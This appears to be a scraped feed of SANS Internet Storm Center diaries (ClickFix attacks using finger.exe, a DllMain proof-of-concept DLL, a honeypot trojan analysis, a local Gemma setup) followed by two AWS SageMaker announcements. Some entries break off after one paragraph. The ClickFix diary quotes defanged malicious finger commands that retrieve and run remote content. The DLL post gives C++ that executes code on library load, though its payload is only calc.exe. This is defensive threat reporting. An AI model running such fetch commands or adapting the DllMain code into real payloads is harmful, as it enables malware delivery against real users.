ClickFix Attacks Still Using the Finger, (Sat, Dec 13th)

This post was originally published on this site

Introduction

Since as early as November 2025, the finger protocol has been used in ClickFix social engineering attacks. BleepingComputer posted a report of this activity on November 15th, and Didier Stevens posted a short follow-up in an ISC diary the next day.

I often investigate two campaigns that employ ClickFix attacks: KongTuke and SmartApeSG. When I checked earlier this week on Thursday, December 11th, both campaigns used commands that ran finger.exe in Windows to retrieve malicious content.

So after nearly a month, ClickFix attacks are still giving us the finger.


Shown above: ClickFix attacks running finger.exe.

KongTuke Example

My investigation of KongTuke activity on December 11th revealed a command for finger gcaptcha@captchaver[.]top from the fake CAPTCHA page.


Shown above: Example of fake CAPTCHA page from the KongTuke campaign on December 11th, 2025.

I recorded network traffic generated by running this ClickFix script, and I used the finger filter in Wireshark to find finger traffic over TCP port 79.


Shown above: Finding finger traffic using the finger filter in Wireshark.

Following the TCP stream of this traffic revealed text returned from the server. The result was a powershell command with Base64 encoded text.


Shown above: Text returned from the server in response to the finger command.

SmartApeSG Example

My investigation of SmartApeSG activity on December 11th revealed a command for finger Galo@91.193.19[.]108 from the fake CAPTCHA page.


Shown above: Example of fake CAPTCHA page from the SmartApeSG campaign on December 11th, 2025.

I recorded network traffic generated by running this ClickFix script, and I used the finger filter in Wireshark to find finger traffic over TCP port 79.


Shown above: Finding finger traffic using the finger filter in Wireshark.

Following the TCP stream of this traffic revealed text returned from the server. The result was a script to retrieve content from pmidpils[.]com/yhb.jpg then save and run that content on the user's Windows host.


Shown above: Text returned from the server in response to the finger command.

Final Words

As Didier Stevens noted in last month's diary about this activity, corporate environments with an explicit proxy will block TCP port 79 traffic generated by finger.exe. However, if TCP port 79 traffic isn't blocked, these attacks could still be effective.

Bradley Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Abusing DLLs EntryPoint for the Fun, (Fri, Dec 12th)

This post was originally published on this site

In the Microsoft Windows ecosystem, DLLs (Dynamic Load Libraries) are PE files like regular programs. One of the main differences is that they export functions that can be called by programs that load them. By example, to call RegOpenKeyExA(), the program must first load the ADVAPI32.dll. A PE files has a lot of headers (metadata) that contain useful information used by the loader to prepare the execution in memory. One of them is the EntryPoint, it contains the (relative virtual) address where the program will start to execute.


In case of a DLL, there is also an entry point called logically the DLLEntryPoint. The code located at this address will be executed when the library is (un)loaded. The function executed is called DllMain()[1] and expects three parameters:

BOOL WINAPI DllMain(
  _In_ HINSTANCE hinstDLL, 
  _In_ DWORD fdwReason, 
  _In_ LPVOID lpvReserved
);

The second parmeter indicates why the DLL entry-point function is being called:

  • DLL_PROCESS_DETACH (0)
  • DLL_PROCESS_ATTACH (1)
  • DLL_THREAD_ATTACH (2)
  • DLL_THREAD_DETACH (3)

Note that this function is optional but it is usually implemented to prepare the environment used by the DLL like loading resources, creating variables, etc… Microsoft recommends also to avoid performing sensitive actions at that location.

Many maware are deployed as DLLs because it's more challenging to detect. The tool regsvr32.exe[2] is a classic attack vector because it helps to register a DLL in the system (such DLL will implement a DllRegisterServer() function). Another tool is rundll32.exe[3] that allows to call a function provided by a DLL:

C:> rundll32.exe mydll.dll,myExportedFunction

When a suspicious DLL is being investigated, the first reflex of many Reverse Engineers is to look at the exported function(s) but don't pay attention to the entrypoint. They look at the export table:

This DllMain() is a very nice place where threat actors could store malicious code that will probably remains below the radar if you don’t know that this EntryPoint exists. I wrote a proof-of-concept DLL that executes some code once loaded (it will just pop up a calc.exe). Here is the simple code:

// evildll.cpp
#include <windows.h>
#pragma comment(lib, "user32.lib")

extern "C" __declspec(dllexport) void SafeFunction() {
    // Simple exported function
    MessageBoxA(NULL, "SafeFunction() was called!", "evildll", MB_OK | MB_ICONINFORMATION);
}

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD  ul_reason_for_call,
                      LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
        {
            // Optional: disable thread notifications to reduce overhead
            DisableThreadLibraryCalls(hModule);

            STARTUPINFOA si{};
            PROCESS_INFORMATION pi{};
            si.cb = sizeof(si);
            char cmdLine[] = "calc.exe";

            BOOL ok = CreateProcessA(NULL, cmdLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
            if (ok) {
                CloseHandle(pi.hThread);
                CloseHandle(pi.hProcess);
            } else {
                // optional: GetLastError() handling/logging
            }
            break;
        }
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

And now, a simple program used to load my DLL:

// loader.cpp
#include <windows.h>
#include <stdio.h>

typedef void (*SAFEFUNC)();

int main()
{
    // Load the DLL
    HMODULE hDll = LoadLibraryA("evildll.dll");
    if (!hDll)
    {
        printf("LoadLibrary failed (error %lu)n", GetLastError());
        return 1;
    }
    printf("[+] DLL loaded successfullyn");

    // Resolve the function
    SAFEFUNC SafeFunction = (SAFEFUNC)GetProcAddress(hDll, "SafeFunction");
    if (!SafeFunction)
    {
        printf("GetProcAddress failed (error %lu)n", GetLastError());
        FreeLibrary(hDll);
        return 1;
    }
    printf("[+] SafeFunction() resolvedn");

    // Call the function
    SafeFunction();

    // Unload DLL
    FreeLibrary(hDll);

    return 0;
}

Let's compile the DLL, the loader and execute it:

When the DLL is loaded with LoadLibraryA(), the calc.exe process is spawned automatically, even if no DLL function is invoked!

Conclusion: Always have a quick look at the DLL entry point!

[1] https://learn.microsoft.com/en-us/windows/win32/dlls/dllmain
[2] https://attack.mitre.org/techniques/T1218/010/
[3] https://attack.mitre.org/techniques/T1218/011/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Using AI Gemma 3 Locally with a Single CPU , (Wed, Dec 10th)

This post was originally published on this site

Several months ago, I got a Nucbox K8 Plus minicomputer to use as a Proxmox 9 server. At the time of this acquisition, I didn't realize this minicomputer had an artificial intelligence (AI) engine [1] build in the CPU that could be used to run AI applications locally. A coworker recommended that I try Google Gemma 3 as a local AI open model to work with my use cases.

"Gemma is a family of generative artificial intelligence (AI) models and you can use them in a wide variety of generation tasks, including question answering, summarization, and reasoning." [2], a review of the Gemma 3 key features is also posted on this page. This page [3] lists the minimum requirements for the 5 Gemma 3 models 270M, 1B, 4B, 12B, and 27B.

Default Open WebUI

My Setup with Open WebUI

  • OS is a Linux Container (LXC) Ubuntu 24.04
  • Ollama with gemma3:12b [4]
  • Open WebUI [5]

Installing Ollama with Gemma 3

I used these steps to get Gemma setup. First review the requirements for RAM [3] before deciding with Gemma 3 model to install. You can start small (i.e. 4B or smaller) for testing before using a larger model. I'm using  4B and 12B with 16 GB of RAM with my installation. 

If you want to test some queries before installing the WebUI, this last command will open the interpreter:

ollama run gemma3:4b

Since I have a Ryzen 7 CPU, my next step was to install the admgpu [7] software to use the AI features of the CPU. The last step is to install the graphical interface to work from a browser using the Open WebUI [5] and there are several models listed here to get the WebUI running. I had to try a few combinations; in the end this is what I used:

sudo docker run -d -p 80:8080 -v ollama:/root/.ollama –add-host=host.docker.internal:host-gateway -v open-webui:/app/backend/data –name open-webui –restart always ghcr.io/open-webui/open-webui:main

Bugs in Proxmox 9 for LXC and AppArmor

For the Linux Container to run correctly, I had to edit the edit the LXC config file (114 is the container number) and add those two lines:

vi /etc/pve/lxc/114.conf

  • lxc.apparmor.profile: unconfined
  • lxc.mount.entry: /dev/null sys/module/apparmor/parameters/enabled none bind 0 0

And it may also be necessary to add this as well in the sudo command before installing the docker: –security-opt apparmor:unconfined

Login WebUI Interface

After the installation of the WebUI, you need to create the first admin account before being able to login.My first query asked my AI to describe the IPv4 header:

Gemma 3 offers the ability to work with large files with its 128K context, work with images and has multilingual support which is practical if you know multiple languages. Finally, it can run locally in PC, laptop and smartphone on a single GPU or TPU and smaller devices. If you have experience using Gemma 3, what are the use cases you are using it? You can add your comments in our contact form.

[1] https://www.amd.com/en/products/processors/laptop/ryzen/8000-series/amd-ryzen-7-8845hs.html
[2] https://ai.google.dev/gemma/docs/core
[3] https://ai.google.dev/gemma/docs/core#sizes
[4] https://deepmind.google/models/gemma/gemma-3/
[5] https://github.com/open-webui/open-webui
[6] https://ai.google.dev/gemma/docs/integrations/ollama?utm_source=deepmind.google&utm_medium=referral&utm_campaign=gdm&utm_content
[7] https://rocm.docs.amd.com/projects/radeon-ryzen/en/latest/docs/install/installryz/native_linux/install-ryzen.html
[8] https://forum.proxmox.com/threads/priviledge-container-disabling-apparmor-does-not-work.122168/
[9] https://blog.ktz.me/apparmors-awkward-aftermath-atop-proxmox-9/
[10] https://docs.openwebui.com/

———–
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AutoIT3 Compiled Scripts Dropping Shellcodes, (Fri, Dec 5th)

This post was originally published on this site

AutoIT3[1] is a powerful language that helps to built nice applications for Windows environments, mainly to automate tasks. If it looks pretty old, the latest version was released last September and it remains popular amongst developers, for the good… or the bad! Malware written in AutoIt3 has existed since the late 2000s, when attackers realized that the language was easy to learn (close to basic) but can also compiled into standalone PE files! From a malware point of view, such executables make an extended use of packed data, making them more stealthy.

Nation-State Attack or Compromised Government? [Guest Diary], (Thu, Dec 4th)

This post was originally published on this site

[This is a Guest Diary by Jackie Nguyen, an ISC intern as part of the SANS.edu BACS program]

The ISC internship didn't just teach me about security, it changed how I thought about threats entirely. There's something intriguing about watching live attacks materialize on your DShield Honeypot, knowing that somewhere across the world, an attacker just made a move. And the feedback loop of writing detailed attack observations, then having experienced analysts critique and refine your analysis? That's where real learning happens. One attack observation in particular stands out as a perfect example of what makes this internship so powerful. Let me show you what I discovered!

The Beginning…

On November 10, 2025, my honeypot captured very interesting activity that really demonstrates how evolved modern threat actors are getting. What initially appeared to be a simple, but successful SSH brute force attempt quickly revealed itself as something far more concerning, a deployment of an advanced trojan designed for long-term persistence and evasion.

What happened?

Suspicious activity was detected when the IP address 103[.]148[.]195[.]161 successfully SSH’d into my honeypot using the credentials username “root” and password “linux”. The bad actor maintained access to the honeypot for 1 minute and 45 seconds but ultimately ran no commands. Instead, the attacker uploaded a single file, a trojan binary named “sshd” designed to evade security detections by pretending to be the OpenSSH daemon. It was an Executable and Linkable Format (ELF) binary (7a9da7d10aa80b0f9e2e3f9e518030c86026a636e0b6de35905e15dd4c8e3e2d) that was classified as malicious by VirusTotal and Hybrid-Analysis.

We won’t be able to see what the Trojan did on my honeypot at this time, however, I found the hash on Hybrid-Analysis and got a good idea of what the trojan does.

A screenshot of the cowrie output using Jesse La Grew’s cowrieprocessor [4]

Trojan File Analysis

MITRE ATT&CK MAPPING

•    T1078 – Valid Accounts
•    T1110.001 – Brute Force
•    T1204.002 – User Execution
•    T1036.005 – Masquerading
•    T1554 – Compromise Client Software Binary
•    T1548.001 – Abuse Elevation Control Mechanism
•    T1027 – Obfuscated Files or Information
•    T1497 – Virtualization/Sandbox Evasion
•    T1480 – Execution Guardrails
•    T1003.008 – OS Credential Dumping

Prevent Similar Attacks

1.    Disable Password Authentication and utilize SSH keys instead
2.    IP Allowlisting
3.    IDS/IPS/EDR
4.    Threat Hunting
5.    MFA

What does this show?

This really shows how much effort sophisticated attackers would put in for long-term persistence and advanced evasion. Attacks from a government IP address doesn’t always mean it’s the government; it more than likely would mean that they were compromised. If you think about it logically, why would a nation-state threat actor use their actual government IP address to execute attacks?

Importance?

It’s important when working on a high performing security team to not attribute attacks to the wrong threat actor. Politically, this may cause problems, especially if the company you’re working for has a large media presence. Problems including wrongful retaliation and political tension could arise from making this mistake.

This attack also shows how threat actors use legitimate processes to blend in with normal ones. We must remember that the goal of this attacker is most likely long-term so they will do everything they can to evade your defenses.

Actionable Intelligence for Defenders

Threat hunting is a critical part of any security program and having concrete Indicators of Compromise (IOCs) like file hashes, malicious IP addresses, and more would give teams actionable intelligence to use immediately. This observation also helps defenders understand what to look for. Brief sessions without commands can be just as dangerous as those with suspicious activity.

Key Takeaways

This attack really shows how threat actors are getting more sophisticated. By uploading a legitimate looking trojan instead of running commands, the attacker could have avoided the typical red flags most monitoring tools look for. The use of a government IP address also teaches us an important lesson not to immediately jump to conclusions solely based on IP block owner since it might have been compromised. For analysts out there, what seems to be a quiet session can sometimes be the most dangerous.

[1] https://www.virustotal.com/gui/file/7a9da7d10aa80b0f9e2e3f9e518030c86026a636e0b6de35905e15dd4c8e3e2d/detection
[2 ]https://www.abuseipdb.com/whois/103.148.195.161
[3] https://hybridanalysis.com/sample/7a9da7d10aa80b0f9e2e3f9e518030c86026a636e0b6de35905e15dd4c8e3e2d/6542c8b6abeb51c5ee0bbf2a
[4] https://github.com/jslagrew/cowrieprocessor
[5] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Attempts to Bypass CDNs, (Wed, Dec 3rd)

This post was originally published on this site

Currently, in order to provide basic DDoS protection and filter aggressive bots, some form of Content Delivery Network (CDN) is usually the simplest and most cost-effective way to protect a web application. In a typical setup, DNS is used to point clients to the CDN, and the CDN will then forward the request to the actual web server. There are a number of companies offering services like this, and cloud providers will usually have solutions like this as well.

New serverless customization in Amazon SageMaker AI accelerates model fine-tuning

This post was originally published on this site

Today, I’m happy to announce new serverless customization in Amazon SageMaker AI for popular AI models, such as Amazon Nova, DeepSeek, GPT-OSS, Llama, and Qwen. The new customization capability provides an easy-to-use interface for the latest fine-tuning techniques like reinforcement learning, so you can accelerate the AI model customization process from months to days.

With a few clicks, you can seamlessly select a model and customization technique, and handle model evaluation and deployment—all entirely serverless so you can focus on model tuning rather than managing infrastructure. When you choose serverless customization, SageMaker AI automatically selects and provisions the appropriate compute resources based on the model and data size.

Getting started with serverless model customization
You can get started customizing models in Amazon SageMaker Studio. Choose Models in the left navigation pane and check out your favorite AI models to be customized.

Customize with UI
You can customize AI models in a only few clicks. In the Customize model dropdown list for a specific model such as Meta Llama 3.1 8B Instruct, choose Customize with UI.

You can select a customization technique used to adapt the base model to your use case. SageMaker AI supports Supervised Fine-Tuning and the latest model customization techniques including Direct Preference Optimization, Reinforcement Learning from Verifiable Rewards (RLVR), and Reinforcement Learning from AI Feedback (RLAIF). Each technique optimizes models in different ways, with selection influenced by factors such as dataset size and quality, available computational resources, task at hand, desired accuracy levels, and deployment constraints.

Upload or select a training dataset to match the format required by the customization technique selected. Use the values of batch size, learning rate, and number of epochs recommended by the technique selected. You can configure advanced settings such as hyperparameters, a newly introduced serverless MLflow application for experiment tracking, and network and storage volume encryption. Choose Submit to get started on your model training job.

After your training job is complete, you can see the models you created in the My Models tab. Choose View details in one of your models.

By choosing Continue customization, you can continue to customize your model by adjusting hyperparameters or training with different techniques. By choosing Evaluate, you can evaluate your customized model to see how it performs compared to the base model.

When you complete both jobs, you can choose either the SageMaker or Bedrock in the Deploy dropdown list to deploy your model.

You can choose Amazon Bedrock for serverless inference. Choose Bedrock and the model name to deploy the model into Amazon Bedrock. To find your deployed models, choose Imported models in the Bedrock console.

You can also deploy your model to a SageMaker AI inference endpoint if you want to control your deployment resources such as an instance type and instance count. After the SageMaker AI deployment is In service, you can use this endpoint to perform inference. In the Playground tab, you can test your customized model with a single prompt or chat mode.

With the serverless MLflow capability, you can automatically log all critical experiment metrics without modifying code and access rich visualizations for further analysis.

Customize with code
When you choose customizing with code, you can see a sample notebook to fine-tune or deploy AI models. If you want to edit the sample notebook, open it in JupyterLab. Alternatively, you can deploy the model immediately by choosing Deploy.

You can choose the Amazon Bedrock or SageMaker AI endpoint by selecting the deployment resources either from Amazon SageMaker Inference or Amazon SageMaker Hyperpod.

When you choose Deploy on the bottom right of the page, it will be redirected back to the model detail page. After the SageMaker AI deployment is in service, you can use this endpoint to perform inference.

Okay, you’ve seen how to streamline the model customization in the SageMaker AI. You can now choose your favorite way. To learn more, visit the Amazon SageMaker AI Developer Guide.

Now available
New serverless AI model customization in Amazon SageMaker AI is now available in US East (N. Virginia), US West (Oregon), Asia Pacific (Tokyo), and Europe (Ireland) Regions. You only pay for the tokens processed during training and inference. To learn more details, visit Amazon SageMaker AI pricing page.

Give it a try in Amazon SageMaker Studio and send feedback to AWS re:Post for SageMaker or through your usual AWS Support contacts.

Channy

Introducing checkpointless and elastic training on Amazon SageMaker HyperPod

This post was originally published on this site

Today, we’re announcing two new AI model training features within Amazon SageMaker HyperPod: checkpointless training, an approach that mitigates the need for traditional checkpoint-based recovery by enabling peer-to-peer state recovery, and elastic training, enabling AI workloads to automatically scale based on resource availability.

  • Checkpointless training – Checkpointless training eliminates disruptive checkpoint-restart cycles, maintaining forward training momentum despite failures, reducing recovery time from hours to minutes. Accelerate your AI model development, reclaim days from development timelines, and confidently scale training workflows to thousands of AI accelerators.
  • Elastic training  – Elastic training maximizes cluster utilization as training workloads automatically expand to use idle capacity as it becomes available, and contract to yield resources as higher-priority workloads like inference volumes peak. Save hours of engineering time per week spent reconfiguring training jobs based on compute availability.

Rather than spending time managing training infrastructure, these new training techniques mean that your team can concentrate entirely on enhancing model performance, ultimately getting your AI models to market faster. By eliminating the traditional checkpoint dependencies and fully utilizing available capacity, you can significantly reduce model training completion times.

Checkpointless training: How it works
Traditional checkpoint-based recovery has these sequential job stages: 1) job termination and restart, 2) process discovery and network setup, 3) checkpoint retrieval, 4) data loader initialization, and 5) training loop resumption. When failures occur, each stage can become a bottleneck and training recovery can take up to an hour on self-managed training clusters. The entire cluster must wait for every single stage to complete before training can resume. This can lead to the entire training cluster sitting idle during recovery operations, which increases costs and extends the time to market.

Checkpointless training removes this bottleneck entirely by maintaining continuous model state preservation across the training cluster. When failures occur, the system instantly recovers by using healthy peers, avoiding the need for a checkpoint-based recovery that requires restarting the entire job. As a result, checkpointless training enables fault recovery in minutes.

Checkpointless training is designed for incremental adoption and built on four core components that work together: 1) collective communications initialization optimizations, 2) memory-mapped data loading that enables caching, 3) in-process recovery, and 4) checkpointless peer-to-peer state replication. These components are orchestrated through the HyperPod training operator that is used to launch the job. Each component optimizes a specific step in the recovery process, and together they enable automatic detection and recovery of infrastructure faults in minutes with zero manual intervention, even with thousands of AI accelerators. You can progressively enable each of these features as your training scales.

The latest Amazon Nova models were trained using this technology on tens of thousands of accelerators. Additionally, based on internal studies on cluster sizes ranging between 16 GPUs to over 2,000 GPUs, checkpointless training showcased significant improvements in recovery times, reducing downtime by over 80% compared to traditional checkpoint-based recovery.

To learn more, visit HyperPod Checkpointless Training in the Amazon SageMaker AI Developer Guide.

Elastic training: How it works
On clusters that run different types of modern AI workloads, accelerator availability can change continuously throughout the day as short-duration training runs complete, inference spikes occur and subside, or resources free up from completed experiments. Despite this dynamic availability of AI accelerators, traditional training workloads remain locked into their initial compute allocation, unable to take advantage of idle accelerators without manual intervention. This rigidity leaves valuable GPU capacity unused and prevents organizations from maximizing their infrastructure investment.

Elastic training transforms how training workloads interact with cluster resources. Training jobs can automatically scale up to utilize available accelerators and gracefully contract when resources are needed elsewhere, all while maintaining training quality.

Workload elasticity is enabled through the HyperPod training operator that orchestrates scaling decisions through integration with the Kubernetes control plane and resource scheduler. It continuously monitors cluster state through three primary channels: pod lifecycle events, node availability changes, and resource scheduler priority signals. This comprehensive monitoring enables near-instantaneous detection of scaling opportunities, whether from newly available resources or requests from higher-priority workloads.

The scaling mechanism relies on adding and removing data parallel replicas. When additional compute resources become available, new data parallel replicas join the training job, accelerating throughput. Conversely, during scale-down events (for example, when a higher-priority workload requests resources), the system scales down by removing replicas rather than terminating the entire job, allowing training to continue at reduced capacity.

Across different scales, the system preserves the global batch size and adapts learning rates, preventing model convergence from being adversely impacted. This enables workloads to dynamically scale up or down to utilize available AI accelerators without any manual intervention.

You can start elastic training through the HyperPod recipes for publicly available foundation models (FMs) including Llama and GPT-OSS. Additionally, you can modify your PyTorch training scripts to add elastic event handlers, which enable the job to dynamically scale.

To learn more, visit the HyperPod Elastic Training in the Amazon SageMaker AI Developer Guide. To get started, find the HyperPod recipes available in the AWS GitHub repository.

Now available
Both features are available in all the Regions in which Amazon SageMaker HyperPod is available. You can use these training techniques without additional cost. To learn more, visit the SageMaker HyperPod product page and SageMaker AI pricing page.

Give it a try and send feedback to AWS re:Post for SageMaker or through your usual AWS Support contacts.

Channy